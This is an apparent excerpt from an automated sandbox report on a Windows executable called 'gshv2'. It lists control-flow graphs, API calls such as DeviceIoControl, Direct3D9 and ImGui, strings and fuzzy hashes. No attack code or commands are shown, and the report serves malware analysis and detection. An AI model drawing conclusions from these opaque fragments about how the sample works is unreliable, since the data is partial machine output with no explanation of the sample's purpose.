620->625 622 7ff62c0a6a92-7ff62c0a6a9e free 621->622 623 7ff62c0a6a8c 621->623 622->620 623->622 626 7ff62c0a6ac4 624->626 627 7ff62c0a6aca-7ff62c0a6ad6 free 624->627 628 7ff62c0a6af0-7ff62c0a6af6 625->628 626->627 627->625 629 7ff62c0a6af8-7ff62c0a6b06 628->629 630 7ff62c0a6b1d-7ff62c0a6b25 628->630 632 7ff62c0a6b0e-7ff62c0a6b1a free 629->632 633 7ff62c0a6b08 629->633 630->628 631 7ff62c0a6b27-7ff62c0a6b3d call 7ff62c0bae10 630->631 636 7ff62c0a6b3f-7ff62c0a6b50 631->636 637 7ff62c0a6b6b-7ff62c0a6b75 631->637 632->630 633->632 638 7ff62c0a6b52 636->638 639 7ff62c0a6b58-7ff62c0a6b64 free 636->639 640 7ff62c0a6ba3-7ff62c0a6bad 637->640 641 7ff62c0a6b77-7ff62c0a6b88 637->641 638->639 639->637 644 7ff62c0a6baf-7ff62c0a6bc0 640->644 645 7ff62c0a6bdb-7ff62c0a6be5 640->645 642 7ff62c0a6b90-7ff62c0a6b9c free 641->642 643 7ff62c0a6b8a 641->643 642->640 643->642 646 7ff62c0a6bc2 644->646 647 7ff62c0a6bc8-7ff62c0a6bd4 free 644->647 648 7ff62c0a6c13-7ff62c0a6c1d 645->648 649 7ff62c0a6be7-7ff62c0a6bf8 645->649 646->647 647->645 652 7ff62c0a6c1f-7ff62c0a6c26 648->652 653 7ff62c0a6c6c-7ff62c0a6c7b 648->653 650 7ff62c0a6c00-7ff62c0a6c0c free 649->650 651 7ff62c0a6bfa 649->651 650->648 651->650 654 7ff62c0a6c30-7ff62c0a6c3e 652->654 655 7ff62c0a6ca9-7ff62c0a6cb3 653->655 656 7ff62c0a6c7d-7ff62c0a6c8e 653->656 657 7ff62c0a6c5e-7ff62c0a6c6a 654->657 658 7ff62c0a6c40-7ff62c0a6c4a 654->658 661 7ff62c0a6ce1-7ff62c0a6ce8 655->661 662 7ff62c0a6cb5-7ff62c0a6cc6 655->662 659 7ff62c0a6c90 656->659 660 7ff62c0a6c96-7ff62c0a6ca2 free 656->660 657->653 657->654 665 7ff62c0a6c52-7ff62c0a6c59 free 658->665 666 7ff62c0a6c4c 658->666 659->660 660->655 663 7ff62c0a6d11-7ff62c0a6d1b 661->663 664 7ff62c0a6cea-7ff62c0a6cff __acrt_iob_func 661->664 667 7ff62c0a6cce-7ff62c0a6cda free 662->667 668 7ff62c0a6cc8 662->668 670 7ff62c0a6d49 663->670 671 7ff62c0a6d1d-7ff62c0a6d2e 663->671 664->663 669 7ff62c0a6d01-7ff62c0a6d0a fclose 664->669 665->657 666->665 667->661 668->667 669->663 670->566 672 7ff62c0a6d30 671->672 673 7ff62c0a6d36-7ff62c0a6d42 free 671->673 672->673 673->670
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free$__acrt_iob_funcfclose
                              • String ID:
                              • API String ID: 3697265371-0
                              • Opcode ID: 454b35d564d6e5944ac5200d73b9475ed702926fe6c3a68b9f5488d28c3c39e9
                              • Instruction ID: 095b59c090d12bd3173d57744cfcd48ccc6bcc11e06323a61caea1af633815c6
                              • Opcode Fuzzy Hash: 454b35d564d6e5944ac5200d73b9475ed702926fe6c3a68b9f5488d28c3c39e9
                              • Instruction Fuzzy Hash: 70F11835B1AB8292EE488B61D9802B873B4FF85BA0F585035CB1D93755CF3EE5619313

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ControlDevice$Sleep
                              • String ID: (
                              • API String ID: 4141367757-3887548279
                              • Opcode ID: f59ffe53ce57800b942c9cc49582da386e5ff2a800f3a1d873edffc63495bc52
                              • Instruction ID: f39f1d50d9e4d201c53cb657547447cd927cccac679fdbeec1c81ebfd7692cb0
                              • Opcode Fuzzy Hash: f59ffe53ce57800b942c9cc49582da386e5ff2a800f3a1d873edffc63495bc52
                              • Instruction Fuzzy Hash: 2222FB36619B809AEB50CF50F88039A7BB4F788358F504536EA8D93B68DF3DD598CB01

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Window$Client$Create$AreaClassExtendFrameIntoLongRectRegisterScreenShowThreadUpdateexit
                              • String ID: Gideion$Gideion1$P
                              • API String ID: 2855494585-533694301
                              • Opcode ID: 2ddbc444a915477e6d26d9afe7d151a90982aa184aa07e13d43f27f361e8098f
                              • Instruction ID: 959139ed6612c1da83098a111033e5c60152412da5ecc4ae4b3fcf1edf4770f7
                              • Opcode Fuzzy Hash: 2ddbc444a915477e6d26d9afe7d151a90982aa184aa07e13d43f27f361e8098f
                              • Instruction Fuzzy Hash: 7241FF75A08B8286EB10CF14FC8076AB761FB88764F544639DA9DC3664DF3DE594CB02

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 964 7ff62c0b29b0-7ff62c0b29c3 965 7ff62c0b29e4-7ff62c0b29ee 964->965 966 7ff62c0b29c5-7ff62c0b29cf 964->966 969 7ff62c0b29f0-7ff62c0b29fa 965->969 970 7ff62c0b2a0f-7ff62c0b2a19 965->970 967 7ff62c0b29d1 966->967 968 7ff62c0b29d7-7ff62c0b29e3 free 966->968 967->968 968->965 971 7ff62c0b2a02-7ff62c0b2a0e free 969->971 972 7ff62c0b29fc 969->972 973 7ff62c0b2a3a-7ff62c0b2a44 970->973 974 7ff62c0b2a1b-7ff62c0b2a25 970->974 971->970 972->971 977 7ff62c0b2a65-7ff62c0b2a6f 973->977 978 7ff62c0b2a46-7ff62c0b2a50 973->978 975 7ff62c0b2a27 974->975 976 7ff62c0b2a2d-7ff62c0b2a39 free 974->976 975->976 976->973 979 7ff62c0b2a90-7ff62c0b2ab3 call 7ff62c0c01e0 call 7ff62c0a2590 977->979 980 7ff62c0b2a71-7ff62c0b2a7b 977->980 981 7ff62c0b2a52 978->981 982 7ff62c0b2a58-7ff62c0b2a64 free 978->982 989 7ff62c0b2ad4-7ff62c0b2ade 979->989 990 7ff62c0b2ab5-7ff62c0b2abf 979->990 983 7ff62c0b2a83-7ff62c0b2a8f free 980->983 984 7ff62c0b2a7d 980->984 981->982 982->977 983->979 984->983 993 7ff62c0b2ae0-7ff62c0b2aea 989->993 994 7ff62c0b2aff-7ff62c0b2b16 call 7ff62c0b1e30 989->994 991 7ff62c0b2ac1 990->991 992 7ff62c0b2ac7-7ff62c0b2ad3 free 990->992 991->992 992->989 996 7ff62c0b2af2-7ff62c0b2afe free 993->996 997 7ff62c0b2aec 993->997 999 7ff62c0b2b18-7ff62c0b2b22 994->999 1000 7ff62c0b2b37-7ff62c0b2b96 call 7ff62c0a1a20 call 7ff62c0cf8d8 994->1000 996->994 997->996 1001 7ff62c0b2b24 999->1001 1002 7ff62c0b2b2a-7ff62c0b2b36 free 999->1002 1007 7ff62c0b2b98-7ff62c0b2ba2 1000->1007 1008 7ff62c0b2bb7-7ff62c0b2bc1 1000->1008 1001->1002 1002->1000 1009 7ff62c0b2ba4 1007->1009 1010 7ff62c0b2baa-7ff62c0b2bb6 free 1007->1010 1011 7ff62c0b2be2-7ff62c0b2bec 1008->1011 1012 7ff62c0b2bc3-7ff62c0b2bcd 1008->1012 1009->1010 1010->1008 1015 7ff62c0b2bee-7ff62c0b2bf8 1011->1015 1016 7ff62c0b2c0d-7ff62c0b2c17 1011->1016 1013 7ff62c0b2bcf 1012->1013 1014 7ff62c0b2bd5-7ff62c0b2be1 free 1012->1014 1013->1014 1014->1011 1017 7ff62c0b2c00-7ff62c0b2c0c free 1015->1017 1018 7ff62c0b2bfa 1015->1018 1019 7ff62c0b2c38-7ff62c0b2c42 1016->1019 1020 7ff62c0b2c19-7ff62c0b2c23 1016->1020 1017->1016 1018->1017 1023 7ff62c0b2c44-7ff62c0b2c4e 1019->1023 1024 7ff62c0b2c63-7ff62c0b2c6d 1019->1024 1021 7ff62c0b2c25 1020->1021 1022 7ff62c0b2c2b-7ff62c0b2c37 free 1020->1022 1021->1022 1022->1019 1025 7ff62c0b2c50 1023->1025 1026 7ff62c0b2c56-7ff62c0b2c62 free 1023->1026 1027 7ff62c0b2c8e-7ff62c0b2c98 1024->1027 1028 7ff62c0b2c6f-7ff62c0b2c79 1024->1028 1025->1026 1026->1024 1031 7ff62c0b2cb9-7ff62c0b2cc3 1027->1031 1032 7ff62c0b2c9a-7ff62c0b2ca4 1027->1032 1029 7ff62c0b2c81-7ff62c0b2c8d free 1028->1029 1030 7ff62c0b2c7b 1028->1030 1029->1027 1030->1029 1035 7ff62c0b2ce4-7ff62c0b2cee 1031->1035 1036 7ff62c0b2cc5-7ff62c0b2ccf 1031->1036 1033 7ff62c0b2ca6 1032->1033 1034 7ff62c0b2cac-7ff62c0b2cb8 free 1032->1034 1033->1034 1034->1031 1039 7ff62c0b2cf0-7ff62c0b2cfa 1035->1039 1040 7ff62c0b2d0f-7ff62c0b2d19 1035->1040 1037 7ff62c0b2cd1 1036->1037 1038 7ff62c0b2cd7-7ff62c0b2ce3 free 1036->1038 1037->1038 1038->1035 1041 7ff62c0b2d02-7ff62c0b2d0e free 1039->1041 1042 7ff62c0b2cfc 1039->1042 1043 7ff62c0b2d3a-7ff62c0b2d3f 1040->1043 1044 7ff62c0b2d1b-7ff62c0b2d25 1040->1044 1041->1040 1042->1041 1045 7ff62c0b2d27 1044->1045 1046 7ff62c0b2d2d-7ff62c0b2d39 free 1044->1046 1045->1046 1046->1043
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 12c8b87299f2b5bdc6608c0954c27c51b6fa78e47271df93e4bde3ec3944f8cc
                              • Instruction ID: 4a9d671530dcbe9231cce696bbb38a0ff63677e9efe83c8523bd163180e6c96d
                              • Opcode Fuzzy Hash: 12c8b87299f2b5bdc6608c0954c27c51b6fa78e47271df93e4bde3ec3944f8cc
                              • Instruction Fuzzy Hash: 99A1F761A5BA4685FE559B21CC506B923A0FF89FA0F586436CD0DC7399CF2EE6409223

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                              • API String ID: 2565136772-3242537097
                              • Opcode ID: dd6af7c52e87b130b20682909fcda08af477dc62d8720e66baef83e7f0fb16bc
                              • Instruction ID: 205f61071b42de1a4a077aed620f0b27edd9dd7a57f98bb6ac61a29d5d6d5e84
                              • Opcode Fuzzy Hash: dd6af7c52e87b130b20682909fcda08af477dc62d8720e66baef83e7f0fb16bc
                              • Instruction Fuzzy Hash: E7212A20A0AB0391FE159B60FC5427463A0EF48760F584034C90EC26A1EF2FAA59D323

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: ControlDevicecosfsinf$tanf
                              • String ID: (
                              • API String ID: 2523051327-3887548279
                              • Opcode ID: aa6bbfe74aeb7b7f907682442ae4e2d87864ab0c98119cef9920742a0bee4662
                              • Instruction ID: ad45784e655746876b44d5aa477412f747b15e779d7b9cce8601adf1ea2b8fe8
                              • Opcode Fuzzy Hash: aa6bbfe74aeb7b7f907682442ae4e2d87864ab0c98119cef9920742a0bee4662
                              • Instruction Fuzzy Hash: DDB1DA32D28BCD85E6029B36A8411F9B360EF6E354F199B32E94871672DF3A71C5DB01

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1085 7ff62c0c7ff0-7ff62c0c8044 call 7ff62c0cebd0 call 7ff62c0c6e10 1090 7ff62c0c81f4-7ff62c0c8224 call 7ff62c0c6f70 1085->1090 1091 7ff62c0c804a-7ff62c0c80ac powf * 3 1085->1091 1097 7ff62c0c8240-7ff62c0c82a2 pow * 2 1090->1097 1098 7ff62c0c8226 1090->1098 1093 7ff62c0c80ae-7ff62c0c80b5 1091->1093 1094 7ff62c0c80b7-7ff62c0c80bf sqrtf 1091->1094 1096 7ff62c0c80c2-7ff62c0c81de call 7ff62c0cebd0 DeviceIoControl call 7ff62c0c6f70 1093->1096 1094->1096 1096->1097 1113 7ff62c0c81e0 1096->1113 1102 7ff62c0c82a4-7ff62c0c82ab 1097->1102 1103 7ff62c0c82ad-7ff62c0c82b0 sqrt 1097->1103 1098->1097 1100 7ff62c0c8228-7ff62c0c822c 1098->1100 1100->1097 1104 7ff62c0c822e 1100->1104 1106 7ff62c0c82b5-7ff62c0c82c4 1102->1106 1103->1106 1104->1097 1107 7ff62c0c8230-7ff62c0c8235 1104->1107 1109 7ff62c0c8365-7ff62c0c838d 1106->1109 1110 7ff62c0c82ca-7ff62c0c82d1 1106->1110 1112 7ff62c0c8238 1107->1112 1110->1109 1111 7ff62c0c82d7-7ff62c0c8360 call 7ff62c0a34f0 call 7ff62c0bd670 1110->1111 1111->1109 1112->1097 1115 7ff62c0c823a 1112->1115 1113->1097 1116 7ff62c0c81e2-7ff62c0c81e6 1113->1116 1115->1097 1115->1109 1116->1097 1117 7ff62c0c81e8 1116->1117 1117->1097 1119 7ff62c0c81ea-7ff62c0c81f2 1117->1119 1119->1112
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: powf$ControlDevice$sqrtsqrtf
                              • String ID: (
                              • API String ID: 2561187813-3887548279
                              • Opcode ID: ac0b46b314eec62c1b60531a472fb8756049cafc971af5b36dbd49321e850655
                              • Instruction ID: 6ed0f62e591fb748144922f42a950c3129172c051b8c250edde3079c48bfd017
                              • Opcode Fuzzy Hash: ac0b46b314eec62c1b60531a472fb8756049cafc971af5b36dbd49321e850655
                              • Instruction Fuzzy Hash: 75A1F432E18B4989FB02CB7698412EC7370EF6E398F048732EA4C725A5EF297185C755

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1232 7ff62c0c7cf0-7ff62c0c7d40 call 7ff62c0cebd0 call 7ff62c0c6e10 1237 7ff62c0c7ef0-7ff62c0c7f20 call 7ff62c0c6f70 1232->1237 1238 7ff62c0c7d46-7ff62c0c7da8 powf * 3 1232->1238 1245 7ff62c0c7f22 1237->1245 1246 7ff62c0c7f3c-7ff62c0c7f9a pow * 2 1237->1246 1239 7ff62c0c7db3-7ff62c0c7dbb sqrtf 1238->1239 1240 7ff62c0c7daa-7ff62c0c7db1 1238->1240 1242 7ff62c0c7dbe-7ff62c0c7eda call 7ff62c0cebd0 DeviceIoControl call 7ff62c0c6f70 1239->1242 1240->1242 1242->1246 1260 7ff62c0c7edc 1242->1260 1245->1246 1250 7ff62c0c7f24-7ff62c0c7f28 1245->1250 1248 7ff62c0c7fa5-7ff62c0c7fa8 call 7ff62c0d08e0 1246->1248 1249 7ff62c0c7f9c-7ff62c0c7fa3 1246->1249 1253 7ff62c0c7fad-7ff62c0c7fbc 1248->1253 1249->1253 1250->1246 1251 7ff62c0c7f2a 1250->1251 1251->1246 1255 7ff62c0c7f2c-7ff62c0c7f31 1251->1255 1257 7ff62c0c7fbe-7ff62c0c7fc6 call 7ff62c0c73e0 1253->1257 1258 7ff62c0c7fcb-7ff62c0c7fef 1253->1258 1259 7ff62c0c7f34 1255->1259 1257->1258 1259->1246 1262 7ff62c0c7f36 1259->1262 1260->1246 1263 7ff62c0c7ede-7ff62c0c7ee2 1260->1263 1262->1246 1262->1258 1263->1246 1264 7ff62c0c7ee4 1263->1264 1264->1246 1265 7ff62c0c7ee6-7ff62c0c7eee 1264->1265 1265->1259
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: powf$ControlDevice$sqrtf
                              • String ID: (
                              • API String ID: 3413337882-3887548279
                              • Opcode ID: e20ae36b0dca8b8ecdb2643989d4d28dde4676ea68f459578ad1feeac6a0660c
                              • Instruction ID: f9b2ae0d85cc8ded98ddd04db88568de97fd99d29fbf46adafb182adffe35c60
                              • Opcode Fuzzy Hash: e20ae36b0dca8b8ecdb2643989d4d28dde4676ea68f459578ad1feeac6a0660c
                              • Instruction Fuzzy Hash: 0081FA32E28A4989FB02DB7698412EC7370AF6D398F188732E94C721F5DF393586C651
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterCreate9Direct3Frequencyexit
                              • String ID: $imgui_impl_dx9$imgui_impl_win32
                              • API String ID: 3110895712-814279511
                              • Opcode ID: 85baeb4b29ac218d44d1c5f062cd63047f3cf91587362f2b79abd5856a61407e
                              • Instruction ID: ba48bd70c5089fbf54ed519d4cd26c3eb4e42276dd85f3a16d5d525719a47dda
                              • Opcode Fuzzy Hash: 85baeb4b29ac218d44d1c5f062cd63047f3cf91587362f2b79abd5856a61407e
                              • Instruction Fuzzy Hash: 6CC1E972C19BC186E700CF28DD092E477A0FB6979DF28A235DA4849176DF7B6197C701
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 1fa0d7f857d20c47da345544d5a8268a7873b49fbc46b83298b036f43cc9957f
                              • Instruction ID: f4e788ee1d105849f21c3bf809455f33a101e026bd452bb2258131cea24bd757
                              • Opcode Fuzzy Hash: 1fa0d7f857d20c47da345544d5a8268a7873b49fbc46b83298b036f43cc9957f
                              • Instruction Fuzzy Hash: E9612576A4AB4682EF14CF21E88027933A4FF44FA4F185536DE4D87759CF3AE5809362
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memchr$freemallocmemcpy
                              • String ID: Window$]
                              • API String ID: 96147131-2892678728
                              • Opcode ID: 1e3ce68fe67a919c1ef8dab996caa62a58c2a0de4ce7b14b5ffdcece7652cb46
                              • Instruction ID: 997c48ce7f6e40c88106f8a9a7d080ddd504f789f87c4ba7d29e256dcc0840b9
                              • Opcode Fuzzy Hash: 1e3ce68fe67a919c1ef8dab996caa62a58c2a0de4ce7b14b5ffdcece7652cb46
                              • Instruction Fuzzy Hash: 0751D361B0D69581EF10CB569D0427AA791EF49FE4F485131DE4E87B89DF3EE9428302
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 22cd4893fd4d04c37c912c98dead3dc00c251ee0ab305086f2cb2a48242b2a0b
                              • Instruction ID: ab6c4ea7bc96d7594e326c99794e2d01664c7bb50f044d4f4e7c2709d83030e7
                              • Opcode Fuzzy Hash: 22cd4893fd4d04c37c912c98dead3dc00c251ee0ab305086f2cb2a48242b2a0b
                              • Instruction Fuzzy Hash: 5BE14D62A08B8684FF008B64EC403AD3761FB957B4F505635DAAC826E6DF7DE5C4C312
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
                              • Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd
                              Similarity
                              • API ID: strstr
                              • String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
                              • API String ID: 1392478783-2972057365
                              • Opcode ID: a5f450357e770edd57dd14ac8067e615e87b6543b1fbfceabf829de7da304435
                              • Instruction ID: d7f537c2ce138eded36e61270f80d42b4cfa4a9a19d303d37c782a54e7dc7576
                              • Opcode Fuzzy Hash: a5f450357e770edd57dd14ac8067e615e87b6543b1fbfceabf829de7da304435
                              • Instruction Fuzzy Hash: 7C51CD32A18A8286EF15CF11DC444B8B7A0FB89BA4F558136DE4C87394CF39E991CB42
                              APIs
                              • memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF1E1
                              • memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF1EF
                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF228
                              • memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF232
                              • memcpy.VCRUNTIME140(?,?,?,?,00007FF62C0CE8FB,?,?,?,?,?,00007FF62C0A163D), ref: 00007FF62C0CF240
                              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62C0CF275
                              Memory Dump Source
                              • Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true
